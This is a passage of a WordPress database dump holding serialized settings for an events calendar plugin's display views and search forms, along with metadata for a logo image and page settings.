1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:9:\"timetable\";a:18:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:21:\"number_of_days_modern\";s:1:\"7\";s:14:\"number_of_days\";s:1:\"5\";s:10:\"week_start\";s:2:\"-1\";s:10:\"start_time\";s:1:\"1\";s:8:\"end_time\";s:2:\"13\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:7:\"masonry\";a:22:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:9:\"filter_by\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"fit_to_row\";s:1:\"0\";s:17:\"masonry_like_grid\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:5:\"cover\";a:12:{s:5:\"style\";s:7:\"classic\";s:18:\"date_format_clean1\";s:1:\"d\";s:18:\"date_format_clean2\";s:1:\"M\";s:18:\"date_format_clean3\";s:1:\"Y\";s:20:\"date_format_classic1\";s:3:\"F d\";s:20:\"date_format_classic2\";s:1:\"l\";s:19:\"date_format_modern1\";s:8:\"l, F d Y\";s:8:\"event_id\";s:6:\"264891\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:9:\"countdown\";a:12:{s:5:\"style\";s:6:\"style1\";s:19:\"date_format_style11\";s:5:\"j F Y\";s:19:\"date_format_style21\";s:5:\"j F Y\";s:19:\"date_format_style31\";s:1:\"j\";s:19:\"date_format_style32\";s:1:\"F\";s:19:\"date_format_style33\";s:1:\"Y\";s:8:\"event_id\";s:2:\"-1\";s:8:\"bg_color\";s:7:\"#437df9\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:14:\"available_spot\";a:9:{s:5:\"style\";s:7:\"classic\";s:19:\"fluent_date_format1\";s:3:\"F d\";s:12:\"date_format1\";s:1:\"j\";s:12:\"date_format2\";s:1:\"F\";s:8:\"event_id\";s:2:\"-1\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:8:\"carousel\";a:26:{s:5:\"style\";s:5:\"type1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"Y\";s:18:\"type2_date_format1\";s:6:\"M d, Y\";s:18:\"type3_date_format1\";s:6:\"M d, Y\";s:5:\"count\";s:1:\"2\";s:5:\"limit\";s:0:\"\";s:15:\"autoplay_status\";s:1:\"1\";s:8:\"autoplay\";s:0:\"\";s:11:\"loop_status\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:12:\"archive_link\";s:0:\"\";s:9:\"head_text\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:10:\"navigation\";s:1:\"0\";s:15:\"dots_navigation\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:6:\"slider\";a:28:{s:5:\"style\";s:2:\"t1\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:18:\"type1_date_format1\";s:1:\"d\";s:18:\"type1_date_format2\";s:1:\"F\";s:18:\"type1_date_format3\";s:1:\"l\";s:18:\"type2_date_format1\";s:1:\"d\";s:18:\"type2_date_format2\";s:1:\"F\";s:18:\"type2_date_format3\";s:1:\"l\";s:18:\"type3_date_format1\";s:1:\"d\";s:18:\"type3_date_format2\";s:1:\"F\";s:18:\"type3_date_format3\";s:1:\"l\";s:18:\"type4_date_format1\";s:1:\"d\";s:18:\"type4_date_format2\";s:1:\"F\";s:18:\"type4_date_format3\";s:1:\"l\";s:18:\"type5_date_format1\";s:1:\"d\";s:18:\"type5_date_format2\";s:1:\"F\";s:18:\"type5_date_format3\";s:1:\"l\";s:5:\"limit\";s:0:\"\";s:8:\"autoplay\";s:0:\"\";s:15:\"transition_time\";s:3:\"250\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"display_price\";s:1:\"0\";s:25:\"display_available_tickets\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:8:\"timeline\";a:17:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:4:\"tile\";a:17:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"j\";s:18:\"clean_date_format2\";s:1:\"M\";s:5:\"count\";s:1:\"4\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:16:\"load_more_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:16:\"general_calendar\";a:8:{s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:10:\"more_event\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";}s:14:\"thumbnail_size\";a:2:{s:5:\"width\";s:0:\"\";s:6:\"height\";s:0:\"\";}}'),(163232,266752,'_wp_attached_file','2022/05/ek-logo-med-blue.png'),(163233,266752,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:66;s:6:\"height\";i:65;s:4:\"file\";s:28:\"2022/05/ek-logo-med-blue.png\";s:8:\"filesize\";i:4326;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(137349,264431,'sf-options','a:12:{s:4:\"list\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"grid\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:6:\"agenda\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:13:\"full_calendar\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:12:\"monthly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"yearly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:3:\"map\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:10:\"daily_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:11:\"weekly_view\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:9:\"timetable\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:4:\"tile\";a:11:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"time_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}s:16:\"general_calendar\";a:10:{s:8:\"category\";a:1:{s:4:\"type\";s:1:\"0\";}s:8:\"location\";a:1:{s:4:\"type\";s:1:\"0\";}s:9:\"organizer\";a:1:{s:4:\"type\";s:1:\"0\";}s:7:\"speaker\";a:1:{s:4:\"type\";s:1:\"0\";}s:3:\"tag\";a:1:{s:4:\"type\";s:1:\"0\";}s:5:\"label\";a:1:{s:4:\"type\";s:1:\"0\";}s:14:\"address_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}s:10:\"event_cost\";a:1:{s:4:\"type\";s:1:\"0\";}s:12:\"month_filter\";a:1:{s:4:\"type\";s:1:\"0\";}s:11:\"text_search\";a:2:{s:4:\"type\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";}}}'),(137350,264431,'sf_status','0'),(137351,264431,'sf_display_label','1'),(137352,264431,'show_past_events','1'),(137353,264431,'show_only_past_events','0'),(137354,264431,'show_only_ongoing_events','0'),(137355,264430,'_wp_page_template','default'),(137356,264430,'passster_activate_global_protection',NULL),(137357,264430,'passster_activate_protection',NULL),(137358,264430,'passster_protection_type','password'),(137359,264430,'boldgrid_hide_page_title','0'),(137360,264430,'boldgrid_in_page_containers','1'),(137361,264430,'bgseo_robots_index','index'),(137362,264430,'bgseo_robots_follow','follow'),(137363,264437,'protect_children',''),(137364,264437,'_edit_lock','1653366025:2'),(137365,264437,'_edit_last','2'),(137366,264438,'protect_children',''),(137367,264438,'label',''),(137368,264438,'category','116'),(137369,264438,'location',''),(137370,264438,'organizer',''),(137371,264438,'tag',''),(137372,264438,'author',''),(137373,264438,'skin','monthly_view'),(137374,264438,'sk-options','a:20:{s:4:\"list\";a:36:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"M d Y\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:20:\"minimal_date_format3\";s:1:\"l\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:21:\"standard_date_format1\";s:3:\"d M\";s:22:\"accordion_date_format1\";s:1:\"d\";s:22:\"accordion_date_format2\";s:1:\"F\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:20:\"toggle_month_divider\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:19:\"fluent_date_format1\";s:6:\"F d, Y\";s:13:\"display_price\";s:1:\"0\";s:25:\"display_available_tickets\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:4:\"grid\";a:36:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:20:\"classic_date_format1\";s:5:\"d F Y\";s:18:\"clean_date_format1\";s:1:\"d\";s:18:\"clean_date_format2\";s:1:\"F\";s:20:\"minimal_date_format1\";s:1:\"d\";s:20:\"minimal_date_format2\";s:1:\"M\";s:19:\"modern_date_format1\";s:1:\"d\";s:19:\"modern_date_format2\";s:1:\"F\";s:19:\"modern_date_format3\";s:1:\"l\";s:19:\"simple_date_format1\";s:5:\"M d Y\";s:21:\"colorful_date_format1\";s:1:\"d\";s:21:\"colorful_date_format2\";s:1:\"F\";s:21:\"colorful_date_format3\";s:1:\"l\";s:18:\"novel_date_format1\";s:5:\"d F Y\";s:5:\"count\";s:1:\"1\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"include_events_times\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:10:\"map_on_top\";s:1:\"0\";s:15:\"set_geolocation\";s:1:\"0\";s:21:\"set_geolocation_focus\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:19:\"fluent_date_format1\";s:9:\"D, F d, Y\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:6:\"agenda\";a:18:{s:5:\"style\";s:5:\"clean\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:13:\"end_date_type\";s:4:\"date\";s:18:\"maximum_date_range\";s:0:\"\";s:18:\"clean_date_format1\";s:1:\"l\";s:18:\"clean_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:16:\"load_more_button\";s:1:\"1\";s:13:\"month_divider\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:13:\"full_calendar\";a:31:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:12:\"default_view\";s:4:\"list\";s:13:\"monthly_style\";s:5:\"clean\";s:5:\"limit\";s:0:\"\";s:4:\"list\";s:1:\"1\";s:16:\"date_format_list\";s:3:\"d M\";s:18:\"end_date_type_list\";s:4:\"date\";s:23:\"maximum_date_range_list\";s:0:\"\";s:4:\"grid\";s:1:\"0\";s:18:\"end_date_type_grid\";s:4:\"date\";s:23:\"maximum_date_range_grid\";s:0:\"\";s:4:\"tile\";s:1:\"0\";s:6:\"yearly\";s:1:\"0\";s:20:\"date_format_yearly_1\";s:1:\"l\";s:20:\"date_format_yearly_2\";s:3:\"F j\";s:7:\"monthly\";s:1:\"1\";s:19:\"activate_first_date\";s:1:\"0\";s:20:\"activate_current_day\";s:1:\"1\";s:6:\"weekly\";s:1:\"1\";s:5:\"daily\";s:1:\"1\";s:13:\"display_price\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"include_local_time\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:11:\"yearly_view\";a:16:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_year\";s:10:\"start_date\";s:0:\"\";s:19:\"modern_date_format1\";s:1:\"l\";s:19:\"modern_date_format2\";s:3:\"F j\";s:5:\"limit\";s:0:\"\";s:6:\"months\";a:12:{i:1;s:1:\"1\";i:2;s:1:\"1\";i:3;s:1:\"1\";i:4;s:1:\"1\";i:5;s:1:\"1\";i:6;s:1:\"1\";i:7;s:1:\"1\";i:8;s:1:\"1\";i:9;s:1:\"1\";i:10;s:1:\"1\";i:11;s:1:\"1\";i:12;s:1:\"1\";}s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:12:\"monthly_view\";a:17:{s:5:\"style\";s:6:\"simple\";s:15:\"start_date_type\";s:19:\"start_current_month\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:19:\"activate_first_date\";s:1:\"0\";s:20:\"activate_current_day\";s:1:\"1\";s:11:\"display_all\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:3:\"map\";a:5:{s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:3:\"200\";s:11:\"geolocation\";s:1:\"0\";s:17:\"geolocation_focus\";s:1:\"0\";}s:10:\"daily_view\";a:16:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:5:\"today\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:11:\"weekly_view\";a:16:{s:5:\"style\";s:7:\"classic\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s:18:\"display_categories\";s:1:\"0\";s:17:\"display_organizer\";s:1:\"0\";s:20:\"next_previous_button\";s:1:\"1\";s:14:\"booking_button\";s:1:\"0\";s:11:\"custom_data\";s:1:\"0\";s:13:\"detailed_time\";s:1:\"0\";s:10:\"sed_method\";s:1:\"0\";s:11:\"image_popup\";s:1:\"0\";s:16:\"wrapper_bg_color\";s:0:\"\";}s:9:\"timetable\";a:18:{s:5:\"style\";s:6:\"modern\";s:15:\"start_date_type\";s:18:\"start_current_week\";s:10:\"start_date\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:21:\"number_of_days_modern\";s:1:\"7\";s:14:\"number_of_days\";s:1:\"5\";s:10:\"week_start\";s:2:\"-1\";s:10:\"start_time\";s:1:\"1\";s:8:\"end_time\";s:2:\"13\";s:18:\"include_local_time\";s:1:\"0\";s:13:\"display_label\";s:1:\"0\";s:23:\"reason_for_cancellation\";s:1:\"0\";s: